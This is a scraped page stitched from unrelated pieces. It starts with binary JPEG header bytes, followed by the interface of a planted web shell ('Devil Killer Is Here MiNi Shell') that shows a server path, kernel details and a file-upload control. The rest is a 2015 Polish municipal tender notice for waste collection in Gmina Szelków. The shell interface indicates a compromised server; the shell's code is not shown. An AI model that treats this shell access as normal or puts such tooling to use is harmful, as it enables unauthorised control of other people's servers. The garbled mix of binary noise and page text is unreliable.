JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150525/123336-N-2015.html

<p class="kh_header"><b>Stary Szelków: Odbiór i zagospodarowanie odpadów komunalnych  z terenu Gminy Szelków</b><br>
<b>Numer ogłoszenia: 123336 - 2015; data zamieszczenia: 25.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szelków , Stary Szelków 39, 06-220 Stary Szelków, woj. mazowieckie, tel. 029 7176001, faks 029 7176004 w. 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szelkow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych  z terenu Gminy Szelków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie  wszystkich odpadów komunalnych zmieszanych oraz gromadzonych w sposób selektywny od właścicieli nieruchomości zamieszkałych z terenu Gminy Szelków. 

2.1	W ramach zamówienia Wykonawca zobowiązany jest odbierać  i zagospodarować  odpady ze wszystkich nieruchomości zamieszkałych na terenie Gminy Szelków.

Wykonawca odbierający odpady komunalne od właścicieli nieruchomości zobowiązany jest do:
- przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w ustawie z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r., poz. 21),
- przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej instalacji do przetwarzania odpadów komunalnych wynikającej z wojewódzkiego planu gospodarki odpadami.

2.2.	Powierzchnia Gminy Szelków:  113,21 km2. 
2.3.   Liczba  mieszkańców zameldowanych na pobyt stały na terenie Gminy Szelków wg stanu na dzień 31.12.2014r. - 3743
2.4. Dane dotyczące szacowanej  liczby  gospodarstw domowych:  /zgodnie z tabela zamieszczoną do SIWZ/
2.5 Załącznikiem nr 7 i 7a do SIWZ jest wykaz wszystkich nieruchomości zamieszkałych na terenie Gminy Szelków i liczby zameldowanych w nich osób oraz wykaz pojemników. Wykaz załączony jest pomocniczo w celu oszacowania zakresu zamówienia. W okresie realizacji zamówienia dane objęte wykazem będą ulegać zmianie. Nie wpłynie to na cenę zamówienia, która w okresie realizacji umowy jest niezmienna.

2.6	Ilości odpadów [w Mg] zebranych w latach 2011-2014 na terenie gminy:/zgodnie z tabela zamieszczoną do SIWZ/
Wskazane ilości odebranych w latach 2011-2014 odpadów są podane jedynie pomocniczo w celu ułatwienia Wykonawcom wyceny zamówienia. 

2.7	W ramach zamówienia Wykonawca zobowiązany jest odbierać i zagospodarować następujące rodzaje odpadów:

1)	z zamieszkałych nieruchomości: 
a)	niesegregowane (zmieszane) odpady komunalne - odbiór odpadów raz w miesiącu,
b)	segregowane odpady komunalne z podziałem na następujące frakcje:
- odpady suche (m.in. makulatura gazetowa, papier, kartony, plastik, szkło /białe i kolorowe/, metal, wszelkiego rodzaju tworzywa sztuczne, opakowania z metali żelaznych, nieżelaznych, różne opakowania, tekstylia) - odbiór odpadów raz w miesiącu,
- odpady mokre (m. in. odpady kuchenne, resztki jedzenia, odpady roślinne /trawa, liście, chwasty, ziemia po kwiatach/, środki higieny osobistej /pampersy, podpaski, lignina/, resztki i obierki z owoców i warzyw, fusy z kawy, herbaty, skorupki jajek, worki z odkurzaczy, popiół C.O.)- odbiór odpadów raz w miesiącu,
2)	z Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK) pozostałe       odpady komunalne:
a)	zużyte baterie i akumulatory,
b)	zużyty sprzęt elektryczny i elektroniczny,
c)	odpady niebezpieczne powstające w gospodarstwach domowych,
d)	odpady wielkogabarytowe,
e)	odpady budowlano-remontowe i rozbiórkowe,
f)	         zużyte tekstylia i odzież,
g)	odpady kuchenne ulegające biodegradacji,
h)	zużyte opony,
i)	         zużyta folia,
j)	         opakowania po środkach ochrony roślin i nawozach,
k)	popiół C.O.
2.8. Zorganizowanie Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK).
2.8.1. W ramach zamówienia w miejscu wyznaczonym przez Zamawiającego (ogrodzony teren w miejscowości Chyliny, działka nr ewidencyjny 67/1, Gmina Szelków) Wykonawca zorganizuje PSZOK. 
2.8.2. PSZOK zostanie wyposażony przez Wykonawcę w odpowiednie  pojemniki tak aby zapewnić prawidłową segregację odpadów zgodnie z uchwałą  Rady Gminy w Szelkowie w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz  uchwałą  Rady Gminy w Szelkowie w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Szelków.
2.8.3. Wykonawca odpowiada za zachowanie na terenie PSZOK i wokół niego czystości                    i porządku.
2.8.4	PSZOK będzie odbierał odpady od mieszkańców:
-  dwa razy w tygodniu - w każdą sobotę w godz. 1000 - 1400  oraz poniedziałek w godz. 700 - 1100 w okresie letnim (od 16 kwietnia do 15 października), 
- razy w tygodniu - w każdą sobotę w godz. 900 - 1500  w okresie zimowym (od 16 października do 15 kwietnia),
przez cały okres obowiązywania umowy.
2.8.5. Do  PSZOK mieszkańcy mogą oddawać odpady zgodnie z uchwalą  Rady Gminy w  Szelkowie w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz  uchwałą  Rady Gminy w Szelkowie w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy w Szelkowie

2.9. Zbiórka odpadów wielkogabarytowych, odpadów elektrycznych i elektronicznych, zużytych opon.
2.9.1. Wykonawca w ramach zamówienia zobowiązany jest do zrealizowania odbioru odpadów wielkogabarytowych,  odpadów elektrycznych i elektronicznych, zużytych opon bezpośrednio z nieruchomości zamieszkałych. 
Odbiór odpadów wielkogabarytowych odpadów elektrycznych i elektronicznych, zużytych opon w ramach zamówienia powinien być zrealizowany raz w roku lub zgodnie ze złożoną ofertą.
2.9.2. Szczegółowy termin zbiórki w poszczególnych miejscowościach oraz zasady zbiórki  powinny być każdorazowo poprzedzone akcją informacyjną. 
2.9.3. Zbiórka polega na : 
- załadunku na środek transportu odpadów wystawionych przed nieruchomość zamieszkałą,
- zagospodarowaniu odebranych odpadów,
- posprzątaniu miejsc, z których odbierane są wystawione odpady.
2.9.4. Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez podmioty gospodarcze.

2.10.  Obowiązek zapewnienia pojemników
2.10.1. Na czas realizacji zamówienia Wykonawca zobowiązany będzie do zapewnienia posiadaczom nieruchomości zamieszkałych, pojemników na odpady, przystosowanych do opróżniania mechanicznego  o pojemnościach i właściwościach określonych w:
- uchwale  Rady Gminy w Szelkowie w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów,
- oraz  uchwale  Rady Gminy w Szelkowie w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Szelków.
Przekazywane  pojemniki powinny być nowe lub używane, czyste i estetyczne. 
2.10.2. Pojemniki będą przekazywane przez Wykonawcę mieszkańcom na zasadach określonych w uchwale Rady Gminy w Szelkowie, w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów. Ilości i objętości pojemników dla nieruchomości powinny być dopasowane do ilości osób zamieszkałych na niej. 
Wykaz nieruchomości zamieszkałych wraz z ilością osób zameldowanych, wykaz pojemników stanowi załącznik nr 7 i 7a do SIWZ i  będzie na bieżąco aktualizowany przez Zamawiającego. Wykonawca w terminie 1 miesiąca od daty przekazania mu aktualizacji wykazu  zobowiązany będzie do dokonania wymiany pojemników na nieruchomościach lub  dostarczenia dodatkowych  pojemników  stosownie do wprowadzonych zmian.
2.10.3. Pojemniki będą dostarczane przez Wykonawcę mieszkańcom na posesje w okresie  od dnia zawarcia umowy  do dnia 27.06.2015r. zgodnie z wykazem pojemników stanowiącym załącznik nr 7 i 7a do SIWZ (załącznik zostanie uszczegółowiony przez Zamawiającego - w ciągu 3 dni po zawarciu umowy z Wykonawcą - o numery nieruchomości oraz liczbę osób w nich zameldowanych). W terminie do 30.06.2015r. Wykonawca zobowiązany jest przedłożyć Zamawiającemu raport o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach na dzień 27.06.2015r. wraz z  informacją o posesjach, do których pojemników nie dostarczono (z podaniem przyczyny niedostarczenia).
2.10.4. Wykonawca wyposaży PSZOK w pojemniki w ilości i pojemności wynikające z potrzeb, z uwzględnieniem uchwał Rady Gminy w Szelkowie.
2.10.5. Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia pojemników z winy wykonawcy, wykonawca zobowiązany będzie do wymiany uszkodzonego pojemnika na własny koszt.

2.11. Częstotliwość i zasady odbioru i wywozu odpadów.
2.11.1. Odbiór i wywóz odpadów komunalnych wykonawca będzie realizował z częstotliwością  i na   zasadach określonych w uchwale  Rady Gminy w Szelkowie w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów.
2.11.2. Wykonawca zobowiązany jest do opracowania i dostarczenia do wszystkich nieruchomości zamieszkałych harmonogramu wywozu odpadów.
2.11.3. Podczas realizacji umowy niedopuszczalne jest mieszanie selektywnie zebranych odpadów komunalnych z odpadami niesegregowanymi.
2.11.4. Wykonawca zobowiązany jest do sukcesywnego wywozu odpadów z PSZOK tak aby zapewnić  możliwość ciągłego dostarczania odpadów przez mieszkańców gminy.
2.11.5.Odbiór odpadów będzie następował  z pojemników wystawionych przez właściciela nieruchomości na zewnątrz posesji, do drogi dojazdowej, do których zapewniony jest swobodny dojazd.
2.11.6. W zakresie odbioru odpadów z nieruchomości o utrudnionym dojeździe (brak utwardzonej drogi) Wykonawca może ustalić odrębne terminy wywozu niż dla pozostałych nieruchomości w danej miejscowości.

2.12.Kontrola  obowiązku segregowania odpadów.
2.12.1. Wykonawca zobowiązany jest do monitorowania ciążącego na właścicielu   nieruchomości obowiązku segregowania odpadów komunalnych.
2.12.2. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się  z obowiązku segregacji odpadów, wykonawca odbiera odpady jako zmieszane. 
2.12.3. W takim przypadku wykonawca umieszcza na pokrywie pojemnika znacznik (np. samoprzylepna kartka) informujący właściciela nieruchomości o otrzymaniu ostrzeżenia za nie przestrzeganie obowiązku segregowania odpadów.
2.12.4. O zaistniałej sytuacji wykonawca zawiadamia Zamawiającego drogą elektroniczną, faxem  lub pisemnie, w terminie do 3 dni roboczych. Do zawiadomienia wykonawca dołącza   protokół określający: dzień wywozu, miejscowość, ulicę i numer posesji oraz krótki opis obrazujący podstawę udzielenia ostrzeżenia właścicielowi nieruchomości. Do protokołu zobowiązany jest dołączyć również dokumentację fotograficzną.
2.12.5. W przypadku segregowanych odpadów, nie może być podstawą odbioru odpadów jako zmieszane, sytuacja gdy wszelkiego rodzaju opakowania po żywności nie są umyte.

2.13. Wykonawca zobowiązany będzie do prowadzenia i przekazania Zamawiającemu dokumentacji związanej z przedmiotem zamówienia:
1)	Raportu na koniec II kwartału 2015r. o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach.
2)	Raportów kwartalnych zawierających określenie  ilości i rodzajów przekazywanych  pojemników w danym kwartale wraz z uaktualnionym raportem o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach.
3)	Sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości i porządku w gminach.
4)	Innych informacji na temat odbioru, unieszkodliwiania i segregacji odpadów, jeżeli w trakcie realizacji zamówienia Zamawiający nałoży taki obowiązek. Obowiązek ten dotyczyć może jedynie informacji, w posiadaniu których będzie wykonawca.
5)	Jako załączniki do faktury miesięcznej wykonawca załączy karty przekazania odpadów uwzględniające datę, kod, rodzaj, wagę przekazanych odpadów komunalnych do RIPOK. Karty przekazania odpadów, o których mowa w zdaniu poprzednim muszą jednoznacznie stwierdzać, że odpady pochodzą z terenu Gminy Szelków.




2.14. Pozostałe obowiązki Wykonawcy:
2.14.1. Wykonawca podczas realizacji przedmiotu umowy zobowiązany jest do osiągnięcia odpowiednich poziomów recyklingu odbieranych odpadów komunalnych zgodnie z art. 3b i 3c ustawy o utrzymaniu czystości i porządku w gminach oraz rozporządzeniami wykonawczymi.
2.14.2. Prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami prawa obowiązującymi w tym zakresie. 
2.14.3. Przekazywanie odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania zmieszanych odpadów komunalnych przeznaczonych do składowania do właściwej Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych 
2.14.4. Przekazywanie selektywnie zebranych odpadów komunalnych do instalacji odzysku                i unieszkodliwiania zgodnie z hierarchią postępowania z odpadami, o której mowa w ustawie z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r., poz. 21)
2.14.5. W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi) gdy nie jest możliwa realizacja usługi zgodnie z harmonogramem, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym a Wykonawcą i może polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości oraz innych terminów ich odbioru - taki sposób spełnienia świadczenia wynikającego z umowy może  być wykonywany jedynie po uzyskaniu wcześniejszej akceptacji Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1.	Wysokość wadium	
Wykonawca zobowiązany jest do wniesienia wadium w wysokości 3 000,00 PLN 	
(słownie: trzy tysiące złotych 00/100)
9.2.	Forma wadium	
Wadium może być wniesione w następujących formach:
-    pieniądzu,
- poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-    gwarancjach bankowych,
-    gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 42 poz. 275 z 2007 r.; Nr 116 poz. 730 i 732; Nr 227 poz. 1505 z 2008 r. oraz Nr 96 poz 620 z 2010 r.)
9.3.	Dokument w formie poręczenia lub gwarancji powinien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
9.4. W treści dokumentów Wykonawcy potwierdzającego wniesienie wadium składanego w innej formie niż pieniądz muszą być wyszczególnione okoliczności, w których Zamawiający może zatrzymać wadium.	
Okoliczności te muszą wynikać wprost z postanowień określonych w art. 46 ustawy Prawo zamówień publicznych.
9.5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Kredyt Bank S.A. Filia Nr 1 w Makowie Mazowieckim O/Ostrołęka Nr 79 1500 1588 1215 8005 0952 0000 z dopiskiem wadium na Odbiór i zagospodarowanie odpadów komunalnych  z terenu Gminy Szelków. 	
Do oferty należy dołączyć kopię polecenia przelewu, potwierdzoną za zgodność z oryginałem, zaś oryginał polecenia przelewu Wykonawca zobowiązany jest przedłożyć  Zamawiającemu na jego żądanie.
9.6. Termin wniesienia wadium	
Dokument potwierdzający wniesienie wadium należy złożyć przed terminem składania ofert. W przypadku wniesienia wadium w pieniądzu na konto bankowe Gminy Szelków, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał przelew przed terminem składania ofert, jest to warunek bezwzględnie konieczny.
9.7. Zwrot wadium
Zwrot wadium nastąpi w trybie art. 46 ustawy Prawo zamówień publicznych.
9.8. Utrata wadium	
Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca:
- odmówił podpisania umowy w sprawie zamówienia na warunkach określonych w ofercie.
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
- zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
- w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia  spełniania warunku - posiadania uprawnień do wykonywania określonej działalności lub czynności Wykonawca musi wykazać, że:
a)	posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami Ustawy z dn. 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (Dz. U. z 2013 r., poz. 1399 z późn. zm.),
b)	posiada  zezwolenie  na transport i zbieranie odpadów komunalnych zgodnie z wymogami ustawy z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r., poz. 21)
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia  spełniania warunku posiadania wiedzy i doświadczenia do oferty należy załączyć następujące oświadczenia lub dokumenty:
a)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, dla celów niniejszego zamówienia wykaz ten musi obejmować wykonanie co najmniej 1 usługi w zakresie odbioru odpadów w ilości co najmniej 150 Mg w ciągu 12 miesięcy  (przy czym brak w  załącznik nr 4 do SIWZ wykonanego zadania o powyższych cechach będzie równoznaczny z brakiem wymaganego doświadczenia) oraz załączeniem dowodów, że została wykonana lub jest wykonywane należycie.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku - dysponowania odpowiednim potencjałem technicznym -Wykonawca  zobowiązany jest wykazać, że:
a) będzie dysponował na czas realizacji zadania:
- co najmniej 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych,
- co najmniej 1 pojazdem przystosowanym do odbierania selektywnie zebranych odpadów komunalnych,
Załącznik nr 5 do SIWZ - Wykaz narzędzi/sprzętu dostępnych Wykonawcy w celu wykonania zamówienia
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku - dysponowania osobami zdolnymi do wykonania zamówienia
Zamawiający oceni na podstawie oświadczenia złożonego przez Wykonawcę:
- złożenie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych, na druku załączonym do niniejszej specyfikacji (zał. nr 2 do SIWZ).
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku - znajdowania się w sytuacji ekonomicznej i finansowej Zamawiający oceni na podstawie oświadczenia złożonego przez Wykonawcę:
- złożenie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych, na druku załączonym do niniejszej specyfikacji (zał. nr 2 do SIWZ).
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

